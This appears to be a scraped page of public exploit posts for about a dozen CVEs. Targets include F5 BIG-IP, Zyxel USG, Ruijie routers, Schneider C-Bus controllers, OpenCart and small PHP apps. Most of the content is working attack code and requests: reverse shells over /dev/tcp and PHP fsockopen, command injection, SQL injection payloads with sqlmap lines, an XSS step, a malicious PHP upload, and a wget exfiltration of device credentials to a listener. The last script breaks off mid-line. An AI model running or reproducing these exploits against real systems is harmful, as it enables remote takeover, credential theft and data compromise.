# Exploit Title: Microweber CMS 1.2.15 - Account Takeover # Date: 2022-05-09 # Exploit Author: Manojkumar J # Vendor Homepage: https://github.com/microweber/microweber # Software Link: https://github.com/microweber/microweber/releases/tag/v1.2.15 # Version: <=1.2.15 # Tested on: Windows10 # CVE : CVE-2022-1631 # Description: Microweber Drag and Drop Website Builder E-commerce CMS v1.2.15 Oauth Misconfiguration Leads To Account Takeover. # Steps to exploit: 1. Create an account with the victim's email address. Register endpoint: https://target-website.com/register# 2. When the victim tries to login with default Oauth providers like Google, Github, Microsoft, Twitter, Linkedin, Telegram or Facebook etc(auth login) with that same e-mail id that we created account before, via this way we can take over the victim's account with the recently created login credentials.
HireHackking
# Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated) # Google Dork: None # Date: November 1, 2021 # Exploit Author: Minh Khoa of VSEC # Vendor Homepage: https://ruijienetworks.com # Software Link: https://www.ruijienetworks.com/resources/products/1896-1900 # Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55 # Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO # CVE: CVE-2021-43164 #!/usr/bin/python3 import os import sys import time import requests import json def enc(PASS): key = "RjYkhwzx$2018!" shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key) return os.popen(shell).read().strip() try: TARGET = sys.argv[1] USER = sys.argv[2] PASS = sys.argv[3] COMMAND = sys.argv[4] except Exception: print("CVE-2021-43164 PoC") print("Usage: python3 exploit.py <target> <user> <pass> <command>") print("Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'") sys.exit(1) endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET) payload = { "method": "login", "params": { "username": USER, "password": enc(PASS), "encry": True, "time": int(time.time()), "limit": False } } r = requests.post(endpoint, json=payload) sid = json.loads(r.text)["data"]["sid"] endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid) payload = { "method": "updateVersion", "params": { "jsonparam": "'; {} #".format(COMMAND) } } r = requests.post(endpoint, json=payload) print(r.text)
HireHackking

F5 BIG-IP 16.0.x - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://www.f5.com/products/big-ip-services # Version: 16.0.x # CVE : CVE-2022-1388 from requests import Request, Session import sys import json def title(): print(''' _______ ________ ___ ___ ___ ___ __ ____ ___ ___ / ____\ \ / / ____| |__ \ / _ \__ \|__ \ /_ |___ \ / _ \ / _ \ | | \ \ / /| |__ ______ ) | | | | ) | ) |_____| | __) | (_) | (_) | | | \ \/ / | __|______/ /| | | |/ / / /______| ||__ < > _ < > _ < | |____ \ / | |____ / /_| |_| / /_ / /_ | |___) | (_) | (_) | \_____| \/ |______| |____|\___/____|____| |_|____/ \___/ \___/ Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ ''') def exploit(url, lhost, lport): url = url + 'mgmt/tm/util/bash' data = { "command":"run", "utilCmdArgs":"-c 'bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1'" } headers = { 'Authorization': 'Basic YWRtaW46', 'Connection':'keep-alive, X-F5-Auth-Token', 'X-F5-Auth-Token': '0' } s = Session() req = Request('POST', url, json=data, headers=headers) prepped = req.prepare() del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15 ) #print(prepped.headers) #print(url) #print(resp.headers) #print(resp.json()) print(resp.status_code) if __name__ == '__main__': title() if(len(sys.argv) < 4): print('[+] USAGE: python3 %s https://<target_url> lhost lport\n'%(sys.argv[0])) print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\n'%(sys.argv[0])) print('[+] Do not forget to run the listener: nc -lvp 4444\n') exit(0) else: exploit(sys.argv[1],sys.argv[2],sys.argv[3])
HireHackking
# Exploit Title: Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated) # Date: 2022-26-03 # Exploit Author: Eren Gozaydin # Vendor Homepage: https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip # Version: 1.0 # Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51 # CVE: CVE-2022-28080 # References: https://nvd.nist.gov/vuln/detail/CVE-2022-28080 ------------------------------------------------------------------------------------ 1. Description: ---------------------- Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in /royal_event/btndates_report.php#?= Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from the affected page with 'todate' parameter and save it like poc.txt. Then run SQLmap to extract the data from the database: sqlmap -r poc.txt --dbms=mysql 3. Example payload: ---------------------- (boolean-based) -1%27+OR+1%3d1+OR+%27ns%27%3d%27ns 4. Burpsuite request: ---------------------- POST /royal_event/btndates_report.php#?= HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Content-Length: 334 Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0 Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380 Referer: http://localhost/royal_event/btndates_report.php#?= User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 --f289a6438bcc45179bcd3eb7ddc555d0 Content-Disposition: form-data; name="todate" -1' OR 1=1 OR 'ns'='ns --f289a6438bcc45179bcd3eb7ddc555d0 Content-Disposition: form-data; name="search" 3 --f289a6438bcc45179bcd3eb7ddc555d0 Content-Disposition: form-data; name="fromdate" 01/01/2011 --f289a6438bcc45179bcd3eb7ddc555d0--
HireHackking

SDT-CW3B1 1.1.0 - OS Command Injection

HACKER · %s · %s

# Exploit Title: SDT-CW3B1 1.1.0 - OS command injection # Date: 2022-05-12 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: 1.0.0 # Vendor home page : http://telesquare.co.kr/ # Authentication Required: No # CVE : CVE-2021-46422 # Tested on: Windows # HTTP Request GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1 Host: IP_HERE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Accept: */* Referer: http:// IP_HERE /admin/system_command.shtml Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close
HireHackking

T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS) # Exploit Author: Alperen Ergel (alpernae IG/TW) # Web Site: https://alperenae.gitbook.io/ # Software Homepage: https://www.tsoft.com.tr/ # Version : v4 # Tested on: Kali Linux # Category: WebApp # Google Dork: N/A # Date: 2022-05-10 # CVE :N/A ######## Description ######## # # 1-) Login administrator page and add product # # 2-) add product name to xss payload # # 3-) Back to web site then will be work payload # # ######## Proof of Concept ######## ========>>> REQUEST <<<========= POST /Y/Moduller/_Urun/Ekle/Action.php HTTP/1.1 Host: domain.com Cookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxxx@xxx.com; customDashboardMapping=true; PHPSESSID=18d05ae557640c93fd9739e241850438; rest1SupportUser=0; nocache=1; last_products=12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1028 Origin: https://domain.com Dnt: 1 Referer: https://domain.com/srv/admin/products/save-edit/index?id=12 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close task=UPDATE&Kategori=18&UrunId=12&UrunAdi={PAYLOAD}&MarkaId=0&MarkaAd=&ModelId=0&ModelAd=&Tedarikci=0&TedarikciKodu=12&StokSayisi=100 &StokBirimId=1&StokBirimAd=Adet&EnYeniUrun=0&EnCokSatilan=0&AramaKelimeleri=&HamSatis=200&AlisFiyat=100&HavaleYuzde=0&Birim=0 &KDV=18&KdvGoster=false&point_catalog=false&IndirimliUrun=true&AltUrunVar=false&YeniUrun=true&AnaSayfaUrun=true&VitrinUrun=false &Gorunme=true&BayiUrun=false&SiparisNotuGoster=false&En=0&Boy=0&Derinlik=0&Agirlik=0&Desi=1&GarantiBilgisi= &TeslimatBilgisi=&UrunNot=&WsUrunKodu=T12&SeoAyar=3&SeoTitle=&SeoLink=deneme-urun-1&SeoDesc=&SeoKeyw= &Detay=%C3%9Cr%C3%BCn%20ekleme%20konusunda%20detayl%C4%B1%20bilgi%20i%C3%A7in%2C%20videomuzu%20 izleyebilirsiniz%3A%C2%A0%0A%3Cdiv%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DoWlUHvi4IPw%22%3Ehttps%3A%2F%2Fwww.youtube.com% 2Fwatch%3Fv%3DoWlUHvi4IPw%3C%2Fa%3E%3C%2Fdiv%3E&AnaKategoriId=18&point=0&subscribe=0&subscribe_frequency=&subscribe_discount_rate=0 &UruneKargoUcretsiz=0&UyeUcretsizKargo=0&BayiUcretsizKargo=0&Sayisal1=0
HireHackking

SolarView Compact 6.0 - OS Command Injection

HACKER · %s · %s

# Exploit Title: SolarView Compact 6.0 - OS Command Injection # Date: 2022-05-15 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: ver.6.00 # Vendor home page : https://www.contec.com/ # Authentication Required: No # CVE : CVE-2022-29303 # Tested on: Windows # Exploit # HTTP Request : POST /conf_mail.php HTTP/1.1 Host: HOST_IP Content-Length: 77 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://HOST_IP Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://HOST_IP/conf_mail.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close mail_address=%3Bid%3Bwhoami%3Bpwd%3Bls%3B&button=%83%81%81%5B%83%8B%91%97%90M
HireHackking

OpenCart v3.x Newsletter Module - Blind SQLi

HACKER · %s · %s

# Exploit Title: OpenCart v3.x Newsletter Module - Blind SQLi # Date: 19/05/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.opencart.com/ # Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=32750&filter_member=Zemez # Version: v.3.0.2.0 # Tested on: XAMPP, Linux # Contact: https://twitter.com/dmaral3noz * Description : Newsletter Module is compatible with any Opencart allows SQL Injection via parameter 'zemez_newsletter_email' in /index.php?route=extension/module/zemez_newsletter/addNewsletter. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. * Steps to Reproduce : - Go to : http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter - Save request in BurpSuite - Run saved request with : sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs Request : =========== POST /index.php?route=extension/module/zemez_newsletter/addNewsletter HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Content-Length: 29 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Connection: Keep-alive zemez_newsletter_email=saud =========== Output : Parameter: zemez_newsletter_email (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: zemez_newsletter_email=saud%' AND 4728=(SELECT (CASE WHEN (4728=4728) THEN 4728 ELSE (SELECT 4929 UNION SELECT 7220) END))-- - Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: zemez_newsletter_email=saud%' OR (SELECT 4303 FROM(SELECT COUNT(*),CONCAT(0x716a6b7171,(SELECT (ELT(4303=4303,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xlVz%'='xlVz Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: zemez_newsletter_email=saud%' AND (SELECT 5968 FROM (SELECT(SLEEP(5)))yYJX) AND 'yJkK%'='yJkK
HireHackking

m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)

HACKER · %s · %s

# Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-01-06 # Exploit Author: Malte V # Vendor Homepage: https://github.com/m1k1o/blog # Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip # Version: 1.3 and below # Tested on: Linux # CVE : CVE-2022-23626 import argparse import json import re from base64 import b64encode import requests as req from bs4 import BeautifulSoup parser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog') parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False) parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost', required=False) parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081, required=False) parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999, required=False) parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False) parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False) args = vars(parser.parse_args()) username = args['username'] password = args['password'] lhost_ip = args['ip'] lhost_port = args['lport'] address = args['url'] port = args['port'] url = f"http://{address}:{port}" blog_cookie = "" csrf_token = "" exploit_file_name = "" header = { "Host": f"{address}", "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "X-Requested-With": "XMLHttpRequest", "Csrf-Token": f"{csrf_token}", "Cookie": f"PHPSESSID={blog_cookie}" } def get_cookie(complete_url): global blog_cookie cookie_header = {} if not blog_cookie: cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}" result = req.get(url=complete_url, headers=cookie_header) if result.status_code == 200: blog_cookie = result.cookies.get_dict()['PHPSESSID'] print(f'[+] Found PHPSESSID: {blog_cookie}') grep_csrf(result) def grep_csrf(result): global csrf_token csrf_regex = r"[a-f0-9]{10}" soup = BeautifulSoup(result.text, 'html.parser') script_tag = str(soup.findAll('script')[1].contents[0]) csrf_token = re.search(csrf_regex, script_tag).group(0) print(f'[+] Found CSRF-Token: {csrf_token}') def login(username, password): get_cookie(url) login_url = f"{url}/ajax.php" login_data = f"action=login&nick={username}&pass={password}" login_header = { "Host": f"{address}", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "X-Requested-With": "XMLHttpRequest", "Csrf-Token": f"{csrf_token}", "Cookie": f"PHPSESSID={blog_cookie}" } result = req.post(url=login_url, headers=login_header, data=login_data) soup = BeautifulSoup(result.text, 'html.parser') login_content = json.loads(soup.text) if login_content.get('logged_in'): print('[*] Successful login') else: print('[!] Bad login') def set_cookie(result): global blog_cookie blog_cookie = result.cookies.get_dict()['PHPSESSID'] def generate_payload(command): return f""" -----------------------------13148889121752486353560141292 Content-Disposition: form-data; name="file"; filename="malicious.gif.php" Content-Type: application/x-httpd-php GIF<?php system(base64_decode('{b64encode(bytes(command, 'utf-8')).decode('ascii')}')); ?>; -----------------------------13148889121752486353560141292-- """ def send_payload(): payload_header = { "Host": f"{address}", "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "X-Requested-With": "XMLHttpRequest", "Csrf-Token": f"{csrf_token}", "Cookie": f"PHPSESSID={blog_cookie}" } upload_url = f"http://{address}:{port}/ajax.php?action=upload_image" command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'" payload = generate_payload(command) print(f"[+] Upload exploit") result = req.post(url=upload_url, headers=payload_header, data=payload, proxies= {"http": "http://127.0.0.1:8080"}) set_exploit_file_name(result.content.decode('ascii')) def set_exploit_file_name(data): global exploit_file_name file_regex = r"[a-zA-Z0-9]{4,5}.php" exploit_file_name = re.search(file_regex, data).group(0) def call_malicious_php(file_name): global header complete_url = f"{url}/data/i/{file_name}" print('[*] Calling reverse shell') result = req.get(url=complete_url) def check_reverse_shell(): yes = {'yes', 'y', 'ye', ''} no = {'no', 'n'} choice = input("Have you got an active netcat listener (y/Y or n/N): ") if choice in yes: return True elif choice in no: print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"") return False def main(): enabled_listener = check_reverse_shell() if enabled_listener: login(username, password) send_payload() call_malicious_php(exploit_file_name) if __name__ == "__main__": main()
HireHackking

Zyxel USG FLEX 5.21 - OS Command Injection

HACKER · %s · %s

# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection # Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800" # Date: May 18th 2022 # Exploit Author: Valentin Lobstein # Vendor Homepage: https://www.zyxel.com # Version: ZLD5.00 thru ZLD5.21 # Tested on: Linux # CVE: CVE-2022-30525 from requests.packages.urllib3.exceptions import InsecureRequestWarning import sys import json import base64 import requests import argparse parser = argparse.ArgumentParser( prog="CVE-2022-30525.py", description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444", ) parser.add_argument("-u", dest="url", help="Specify target URL") parser.add_argument("-r", dest="host", help="Specify Remote host") parser.add_argument("-p", dest="port", help="Specify Remote port") args = parser.parse_args() banner = ( "ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7" "LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg" "ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg" "LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8" "ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg" "KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n" "ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp" "biA6KSApCg==" ) def main(): print("\n" + base64.b64decode(banner).decode("utf-8")) if None in vars(args).values(): print(f"[!] Please enter all parameters !") parser.print_help() sys.exit() if "http" not in args.url: args.url = "https://" + args.url args.url += "/ztp/cgi-bin/handler" exploit(args.url, args.host, args.port) def exploit(url, host, port): headers = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0", "Content-Type": "application/json", } data = { "command": "setWanPortSt", "proto": "dhcp", "port": "4", "vlan_tagged": "1", "vlanid": "5", "mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";', "data": "hi", } requests.packages.urllib3.disable_warnings(InsecureRequestWarning) print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}") try: response = requests.post( url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5 ) except (KeyboardInterrupt, requests.exceptions.Timeout): print("[!] Bye Bye hekcer !") sys.exit(1) finally: try: print("[!] Can't exploit the target ! Code :", response.status_code) except: print("[!] Enjoy your shell !!!") if __name__ == "__main__": main()
HireHackking
# Exploit Title: Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE) # Exploit Author: LiquidWorm #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 Remote Root Exploit # # # Vendor: Schneider Electric SE # Product web page: https://www.se.com | https://www.clipsal.com # Product details: # - https://www.clipsal.com/Trade/Products/ProductDetail?catno=5500SHAC # - https://www.se.com/ww/en/product/5500AC2/application-controller-spacelogic-cbus-rs232-485-ethernet-din-mount-24v-dc/ # Affected version: CLIPSAL 5500SHAC (i.MX28) # CLIPSAL 5500NAC (i.MX28) # SW: 1.10.0, 1.6.0 # HW: 1.0 # Potentially vulnerable (alternative products/same codebase?): 5500NAC2 and 5500AC2 # SpaceLogic C-Bus # # Summary: The C-Bus Network Automation Controller (5500NAC) and the Wiser # for C-Bus Automation Controller (5500SHAC)) is an advanced controller from # Schneider Electric. It is specifically designed to unite the C-Bus home # automation solution with common household communication protocols, from # lighting and climate control, to security, entertainment and energy metering. # The Wiser for C-Bus Automation Controller manages and controls C-Bus systems # for residential homes or zones within a building and integrates functions # such as heating/cooling, energy/load monitoring and remote control for C-Bus # and Modbus. # # Desc: The automation controller suffers from an authenticated arbitrary # command execution vulnerability. An attacker can abuse the Start-up (init) # script editor and exploit the 'script' POST parameter to insert malicious # Lua script code and execute commands with root privileges that will grant # full control of the device. # # ------------------------------------------------------------------------------ # $ ./c-bus.py http://192.168.0.10 "cat /etc/config/httpd;id" 192.168.0.37 8888 # ---------------------------------------------------------------------- # Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at 15.03.2022 11:26:38 # [*] Starting exfiltration handler on port 8888 # [*] Writing Lua initscript... done. # [*] Running os.execute()... done. # [*] Got request from 192.168.0.10:33522 # [*] Printing target's request: # # b"GET / HTTP/1.1\r\nHost: 192.168.0.37:8888\r\nUser-Agent: \nconfig user # 'admin'\n\toption password 'admin123'\n\nconfig user 'remote'\n\toption # password 'remote'\n\nuid=0(root) gid=0(root) groups=0(root)\r\nConnection: # close\r\n\r\n" # # [*] Cleaning up... done. # # $ # ------------------------------------------------------------------------------ # # Tested on: CPU model: ARM926EJ-S rev 5 (v5l) # GNU/Linux 4.4.115 (armv5tejl) # LuaJIT 2.0.5 # FlashSYS v2 # nginx # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Macedonian Information Security Research and Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2022-5707 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5707.php # # # 12.03.2022 # import threading#! import datetime##! import requests##! import socket####! import time######! import sys#######! import re########! from requests.auth import HTTPBasicAuth from time import sleep as spikaj class Wiser: def __init__(self): self.headers = None self.uri = '/scada-main/scripting/' self.savs = self.uri + 'save' self.runs = self.uri + 'run' self.start = datetime.datetime.now() self.start = self.start.strftime('%d.%m.%Y %H:%M:%S') self.creds = HTTPBasicAuth('admin', 'admin123') def memo(self): if len(sys.argv) != 5: self.use() else: self.target = sys.argv[1] self.execmd = sys.argv[2] self.localh = sys.argv[3] self.localp = int(sys.argv[4]) if not 'http' in self.target: self.target = 'http://{}'.format(self.target) def exfil(self): print('[*] Starting exfiltration handler on port {}'.format(self.localp)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', self.localp)) while True: try: s.settimeout(9) s.listen(1) conn, addr = s.accept() print('[*] Got request from {}:{}'.format(addr[0], addr[1])) data = conn.recv(2003) print('[*] Printing target\'s request:') print('\n%s' %data) except socket.timeout as p: print('[!] Something\'s not right. Check your port mappings!') break s.close() self.clean() def mtask(self): konac = threading.Thread(name='thricer.exe', target=self.exfil) konac.start() self.byts() def byts(self): self.headers = { 'Referer':self.target+'/scada-main/main/editor?id=initscript', 'Sec-Ch-Ua':'"(Not(A:Brand";v="8", "Chromium";v="98"', 'Cookie':'x-logout=0; x-auth=; x-login=1; pin=', 'Content-Type':'text/plain;charset=UTF-8', 'User-Agent':'SweetHomeAlabama/2003.59', 'X-Requested-With':'XMLHttpRequest', 'Accept-Language':'en-US,en;q=0.9', 'Accept-Encoding':'gzip, deflate', 'Sec-Ch-Ua-Platform':'"Windows"', 'Sec-Fetch-Site':'same-origin', 'Connection':'keep-alive', 'Sec-Fetch-Dest':'empty', 'Sec-Ch-Ua-Mobile':'?0', 'Sec-Fetch-Mode':'cors', 'Origin':self.target, 'Accept':'*/*', 'sec-gpc':'1' } self.loada = '\x64\x61\x74\x61\x3D\x7B' # data={ self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x34\x22\x3A\x22\x22\x2C' # "ext-comp-1004":"", self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35\x22\x3A\x22\x22\x2C' # "ext-comp-1005":"", self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x22\x3A\x22\x22\x2C' # "ext-comp-1006":"", self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x37\x22\x3A\x22\x22\x2C' # "ext-comp-1007":"", self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x38\x22\x3A\x22\x22\x2C' # "ext-comp-1008":"", self.loada += '\x22\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70\x2D\x73\x65\x61\x72\x63\x68\x22\x3A\x22\x22\x2C' # "scada-help-search":"", self.loada += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x2C' # "id":"initscript", self.loada += '\x22\x73\x63\x72\x69\x70\x74\x22\x3A\x6E\x75\x6C\x6C\x2C' # "script":null, self.loada += '\x22\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C\x79\x22\x3A\x22\x74\x72\x75\x65\x22\x7D' # "scriptonly":"true"} self.loada += '\x26\x73\x63\x72\x69\x70\x74\x3D\x6F\x73\x2E\x65\x78\x65\x63\x75\x74\x65' # &script=os.execute self.loada += '\x28\x27\x77\x67\x65\x74\x20\x2D\x55\x20\x22\x60' # ('wget -U "` self.loada += self.execmd # [command input] self.loada += '\x60\x22\x20' # `". self.loada += self.localh+':'+str(self.localp) # [listener input] self.loada += '\x27\x29' # ') self.loadb = '\x64\x61\x74\x61\x3D\x7B' # data={ self.loadb += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x7D' # "id":"initscript"} print('[*] Writing Lua initscript... ', end='') sys.stdout.flush() spikaj(0.7) htreq = requests.post(self.target+self.savs, data=self.loada, headers=self.headers, auth=self.creds) if not 'success' in htreq.text: print('didn\'t work!') exit(17) else: print('done.') print('[*] Running os.execute()... ', end='') sys.stdout.flush() spikaj(0.7) htreq = requests.post(self.target+self.runs, data=self.loadb, headers=self.headers, auth=self.creds) if not 'success' in htreq.text: print('didn\'t work!') exit(19) else: print('done.') def splash(self): Baah_loon = ''' ###### ########## ###### _\_ ##===----[.].] #( , _\\ # )\__| \ / `-._``-' >@ | | | | | Schneider Electric C-Bus SmartHome Automation Controller | Root Remote Code Execution Proof of Concept | ZSL-2022-5707 | | | ''' print(Baah_loon) def use(self): self.splash() print('Usage: ./c-bus.py [target] [cmd] [lhost] [lport]') exit(0) def clean(self): print('\n[*] Cleaning up... ', end='') sys.stdout.flush() spikaj(0.7) self.headers = {'X-Requested-With':'XMLHttpRequest'} self.blank = '\x64\x61\x74\x61\x3D\x25\x37\x42\x25\x32\x32' self.blank += '\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30' self.blank += '\x30\x34\x25\x32\x32\x25\x33\x41\x25\x32\x32' self.blank += '\x25\x32\x32\x25\x32\x43\x25\x32\x32\x65\x78' self.dlank = '\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35' self.dlank += '\x25\x32\x32\x25\x33\x41\x25\x32\x32\x25\x32' self.dlank += '\x32\x25\x32\x43\x25\x32\x32\x65\x78\x74\x2D' self.dlank += '\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x25\x32' self.clank = '\x32\x25\x33\x41\x25\x32\x32\x25\x32\x32\x25' self.clank += '\x32\x43\x25\x32\x32\x65\x78\x74\x2D\x63\x6F' self.clank += 